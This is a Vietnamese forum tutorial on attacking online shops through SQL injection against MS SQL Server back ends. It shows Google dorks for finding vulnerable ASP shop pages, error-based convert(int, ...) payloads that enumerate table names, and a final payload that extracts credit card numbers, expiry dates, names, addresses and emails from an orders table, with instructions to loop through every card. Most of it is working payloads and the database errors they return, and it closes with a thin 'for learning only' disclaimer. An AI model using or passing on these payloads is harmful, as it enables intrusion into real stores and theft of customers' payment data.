Hack shop qua lỗi SQL server injection
trang này đã được đọc lần
gioi thieu so qua cho anh em biet ve hack sql server inject ha !
hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the thuc
hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi value=hidden),vi the
truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh em cung phai xem qua source 1
chut ha,de roi con biet co nen hack theo cach nao`.
o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac' can hack ca server thi noi
nhieu,noi dai dong lam...
Detail:
search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh em
thuong dung nhu
www.google.com hoac www.froogle.google.com
www.av.com
www.alltheweb.com
yahoo.com
......
ok----search for: allinurl: "/shop/viewproduct.asp" hoac may bac co the search = tu key word allinurl:
"/shop/index.asp" (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra tat rat
nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac JET, hoac
VB.net....net va de nay can phai co su no luc cua anh em trong viec test.
ok
co' duoc muc tieu roi chon dai 1 thang,vd:
/>okay co muc tieu roi bat dau test no ha
/>neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shop/include/viewproduct.asp, line 3
okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet.
ok bat dau tim table
co the test theo cac cach sau ma em da biet

ok bay gio ta se lan luot lay cac table tren column label
lay table thu 1 thong qua cau truy van sau
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password
day du la`
/>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to
a column of data type int.
/shop/include/viewproduct.asp, line 3
ok table 1 la 'categorieslist',muon lay table thu 2 thi phai dung den where table_name not in('table1')
cau truy van nhu sau:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where
%20table_name%20not%
20in('categorieslist')))--sp_password
/>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a
column of data type int.
/shop/include/viewproduct.asp, line 3
table 2 la` 'allorders'
muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay
%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where
%20table_name%20not%
20in('categorieslist','allorders')))--sp_password
day la tat ca cac table cua shop vua lay duoc
'categorieslist','allorders','categories','categorymembers','deliveryZones','dtproperties','essorders','fullorder','key
words',
'optiongroupmembers','optiongroups','optiongroupslist','optionmembers','options','optionslist','orderoptions','or
deroptions-options','orderproducts','orderproducts-products','orders','products','products-categories','products-
options','searchresults','sysconstraints','syssegments'
ok sau khi lay duoc tat ca cac table roi thi ban bat dau lay colum cua table,co 2 kieu lay column,1 la lay tat ca
cac column,ko co muc dich gi hoac de kiem tra toan bo database,2 la` ta da xac dinh duoc can phai lay

choi
lay cc dau tien
%2bconvert(int,(select%20top%201%20cardtype%2b'%20Name:'%2bcardname%2b'%20addr:
%20'%2baddress%2b'%20suburb:%20'%
2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2bpostcode%2b'%20country:%20'%2bcountry
%2b'%20phone:%20'%2bphone%
2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bcardnumber%2b'%20expireymonth:
%20'%2bexpirymonth%2b'%20year:%20'%
2bexpiryyear%20from%20orders))--sp_password
lay' cc thu 2 thi ta them vao o sao ....from orders where cardnumber not in('so card dau tien')
va lan luot lay het cac credit card co tren do'
nhu cai shop o tren thi de dung cho may bac thuc tap va de co them kinh nghiem ma thoi,vi day chi de hoc
hoi,ko nham muc dich pha hoai bat cu ai .